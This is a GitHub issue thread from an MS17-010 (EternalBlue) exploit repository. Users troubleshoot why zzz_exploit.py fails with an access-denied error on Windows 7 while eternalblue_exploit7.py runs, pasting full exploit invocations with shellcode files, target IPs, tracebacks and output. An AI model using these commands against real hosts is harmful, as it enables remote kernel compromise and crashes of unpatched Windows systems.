search

worawit / MS17-010

MS17-010
2.13k stars 1.1k forks source link

zzz_exploit.py can't work properly but eternalblue_exploit7.py work well,tested on win7_x64 #6

Closed greathackerchen closed 7 years ago

greathackerchen commented 7 years ago

_root@kali:~/MS17-010#__ ./zzz_exploit.py 192.168.111.129 shellcode/sc_all.bin Target OS: Windows 7 Ultimate 7600 Traceback (most recent call last): File "./zzz_exploit.py", line 954, in exploit(target, pipe_name) File "./zzz_exploit.py", line 795, in exploit if not info['method'](conn, pipe_name, info): File "./zzz_exploit.py", line 469, in exploit_matched_pairs fid = conn.nt_create_andx(tid, pipe_name) File "/root/MS17-010/mysmb.py", line 170, in nt_create_andx self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask) File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3741, in nt_create_andx if smb.isValidAnswer(SMB.SMB_COM_NT_CREATE_ANDX): File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 712, in isValidAnswer raise SessionError, ("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS) impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

root@kali:~/MS17-010# ping 192.168.111.129 -c 1 PING 192.168.111.129 (192.168.111.129) 56(84) bytes of data. 64 bytes from 192.168.111.129: icmp_seq=1 ttl=128 time=0.906 ms --- 192.168.111.129 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.906/0.906/0.906/0.000 ms

root@kali:~/MS17-010# ./eternalblue_exploit7.py 192.168.111.129 shellcode/sc_all.bin shellcode size: 2284 numGroomConn: 13 Target OS: Windows 7 Ultimate 7600 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status: INVALIDPARAMETER done root@kali:~/MS17-010#

upinarms commented 7 years ago

I am experiencing the same issues as greathacherchen. Plus, the eternalblue_exploit7.py definitely blue screens my Windows 7 64-bit system.

root@lostpup:/opt/MS17-010# ./eternalblue_exploit7.py 192.168.169.130 shellcode/eternalblue_kshellcode_x64.asm shellcode size: 20305 numGroomConn: 13 Target OS: Windows 7 Professional 7601 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status: INVALID_PARAMETER done root@lostpup:/opt/MS17-010#

worawit commented 7 years ago

This one is support issue.